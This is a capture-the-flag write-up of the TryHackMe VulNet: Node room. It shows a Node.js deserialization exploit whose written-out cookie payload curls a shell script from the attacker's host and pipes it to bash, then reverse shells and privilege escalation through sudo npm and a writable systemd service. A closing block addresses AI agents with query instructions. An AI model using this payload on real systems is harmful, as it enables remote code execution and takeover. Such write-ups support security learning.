# VulNet: Node ![](/files/-MdTBxo-x93SKNxJfOzB) ## Scanning Lets run nmap scan to find open ports and services ![](/files/-MdTC5_dgjjKGq3jPvX-) ## Enumeration Lets visit the website on port 8080. ![](/files/-MdTCNU_pg6BjslImJNJ) We have a Node.js webpage, we have some usernames *`Tilo Mitra, Eric Ferraioulo, Reid Burke and Andrew Wooldridge`* Lets look for hidden directories using gobuster ![](/files/-MdTDPEJilYhTlJr612F) Lets look at the login page ![](/files/-MdTDUTN8vqZ6FKQ3Pwx) We have a login form, but we do not have credentials. Lets try to submit random credentials and see what happens when we do with burpsuite. Lets capture the request ![](/files/-MdTE2u8g4DGemIoPzwR) Ok, so it looks like we have a session cookie even though we did not login yet, this is interesting. Lets send this request to the Repeater tab and test different requests with the cookie we have. First lets decode the cookie as it looks encoded with `base64`. ![](/files/-MdTF-HNbTY9cnVpQatJ) So the username is guest and the `isGuest` value is set to true. I tried changing the username to admin and logging in , but it did not work, so lets see what the server will show us when there is an error in the request. ## Exploitation ![](/files/-MdTHCiT49Y-ImDCdSS9) It looks like the web application is trying to unserialize the session cookie but it is showing an error. Lets look for exploit on this. And I found a [blog ](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/)that talks about this and shows us how to exploit this. Reading the blog what we find the exploit that we will use. ![](/files/-MdTIQHLg2bH_uAPAquE) So by passing the `ND_FUNC` into the statement , it will lead to code execution on the web app. So lets try to get a shell on the box, lets create a reverse shell file on our machine so that the server can curl the it and give us a reverse shell. ![](/files/-MdTJlKIy1Z4UG4y8Wty) Next we have to change the payload a little so that it will give us a reverse shell. ``` {"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl 10.13.8.64:8000/shell.sh | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"} ``` Next we have to start a http server on our machine and a netcat listener. ![](/files/-MdTKVQJPZ6swLWh-0wU) Lets encode the payload with base64 and then lets replace the current cookie value with our payload. ![](/files/-MdTLGdTRxO40yGH06YM) Now lets replace it and send the request ![](/files/-MdTLPkMqXudDehECoDa) The file should get downloaded ![](/files/-MdTLUIudeX_TvBb9hpd) And we should have a reverse shell ![](/files/-MdTLZdLT0s71mePaqdJ) ## Privilege Escalation Lets run the `sudo -l` command to see what we can run with sudo. ![](/files/-MdTMGViwHWXtKua6VC3) Lets look on [GTFOBins ](https://gtfobins.github.io/gtfobins/npm/#sudo)to find the commands to switch users to serv-manage. ![](/files/-MdTMdxPfhI6kBbbGwbq) Lets run these commands. ![](/files/-MdTOBXe4Nq6_del9d85) We are now `serv-manage`. We can read the user flag. ![](/files/-MdTOM3pwh8H4O_7fpqg) Lets run `sudo -l` again. ![](/files/-MdTPSkiugO0KsLlmUiZ) Looks like we can edit a system service called `vulnnet-auto.timer` . Lets look at this file ![](/files/-MdTPqUjbFJjnJx0Wc4x) Looks like it is executing a `systemctl service` called `vulnnet-job.service`. Lets see if we can modify this file and see what it contains. ![](/files/-MdTQG2UJMXsPSoDOPWV) We can write to the file. Lets modify the command and replace it with a reverse shell that we used before so that we can get a shell as root. ![](/files/-MdTT-NgUek2GSki9o3L) Lets start a netcat listener and the http server if you stopped it. ![](/files/-MdTTAGq6HvMDvDI9EFF) Lets now run the stop and start the service to get a shell. ![](/files/-MdTWMHFzVMWeQYZp_8p) ![](/files/-MdTWRU331H5PPw0NSsg) We are now root. We can read the root flag. ![](/files/-MdTWafdNwrR28witkWY) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.adityadindi.com/tryhackme/untitled/vulnet-node.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.